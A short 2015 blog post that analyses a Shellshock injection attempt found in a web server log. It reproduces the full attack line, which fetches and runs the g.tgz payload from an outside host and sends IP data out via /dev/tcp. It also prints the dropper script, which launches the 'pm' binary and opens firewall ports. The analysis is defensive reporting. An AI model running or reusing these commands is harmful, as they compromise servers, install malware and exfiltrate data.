Mittwoch, 15. April 2015

Unknown pm malware (Samba related)

On the 13th of April a shellcode injection attempt hit my system. target was to download and run Samba related malware.

46.4.73.171 - - [13/Apr/2015:06:04:07 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\"" "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\""
The g.tgz includes a directory with two files:
  • pm: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped
  • a : a iptables script file
/sbin/ifconfig |grep inet |grep -v inet6 |grep -v 127.0.0.1 |tr ':' ' ' |awk '{print $3}' >> ip
chmod +x pm
for i in `cat ip`
do
./pm -i"$i" -e"$i" -p3838 -d
done
/sbin/iptables -I OUTPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1

/sbin/iptables-save

For further details please visit Virustotal